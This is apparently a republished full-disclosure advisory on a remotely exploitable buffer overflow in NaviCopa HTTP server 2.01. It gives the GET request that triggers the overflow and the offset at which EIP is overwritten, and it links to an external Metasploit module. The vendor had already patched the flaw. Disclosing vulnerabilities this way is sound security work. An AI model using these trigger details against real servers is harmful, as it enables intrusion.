Buffer Overflow in InterVetions' NaviCopa HTTP server 2.01



Buffer Overflow in InterVetions' NaviCopa HTTP server 2.01

While developing one of our advanced security training modules, we
identified a remotely exploitable buffer overflow vulnerability in the
latest release of InterVetions' HTTP server NaviCopa 2.01. Successful
exploitation of this vulnerability allows an attacker to execute
arbitrary code in the context of the NaviCopa HTTP server. ....

The overflow can be triggered by sending a GET request in the following ways:

GET /cgi-bin/AAAAAAAAAAAAA....
or
GET /cgi/AAAAAAAAAAAAAAAAAA...

The amount of submitted characters depends on the location of the
NaviCopa installation folder. By default (Windows English version), it
resides in the Program Files/NaviCOPA directory. In that case, eip is
overwritten with characters 271 to 274. An exploit for this
vulnerability has been developed and successfully tested against
Windows 2000 Advanced Server, Windows XP SP2 and Windows Vista. Not
surprisingly, ASLR (Address Space Layout Randomization) does not
prevent reliable code execution due to its obvious limitations.

An exploit for the Meatsploit Framework is available on our web site:

http://www.skilltube.com/index.php?option=com_content&task=blogsection&id=3&Itemid=37



Countermeasures:
The vendor was informed on March 23, 2007 and published a patched
version 2 hours later. Great response time!



*******************************************************
Partner program:
If you are interested in learning more about vulnerability research
and exploitation techniques, check out our advanced security training
modules on www.skillTube.com. Are you interested in becoming an author
for skillTube.com? Just get in contact with us.



Relevant Pages

  • [Full-disclosure] Buffer Overflow in InterVetions NaviCopa HTTP server 2.01
    ... Buffer Overflow in InterVetions' NaviCopa HTTP server 2.01 ... identified a remotely exploitable buffer overflow vulnerability in the ... and exploitation techniques, check out our advanced security training ...
    (Full-Disclosure)
  • [NEWS] Cisco CatOS Embedded HTTP Server Buffer Overflow
    ... Cisco Catalyst switches running specific versions of Cisco CatOS software ... are vulnerable to a buffer overflow in an embedded HTTP server. ... can be remotely exploited which will cause the switch to fail and reload. ... The vulnerability can be exploited repeatedly and result in a denial of ...
    (Securiteam)
  • IBM AS/400 HTTP Server / attack
    ... IBM's HTTP Server on the AS/400 platform is vulnerable to an attack ... that will show the source code of the page -- such as an .html or .jsp ... I was told it was a bug but not a security vulnerability. ... As far as I know this vulnerability was not yet reported to the public. ...
    (Bugtraq)
  • RE: Cisco vulnerability scanning increase
    ... The workaround for this vulnerability is to disable HTTP server on the ... router or to use TACACS+ or Radius for authentication. ... Enter configuration commands, one per line. ...
    (Incidents)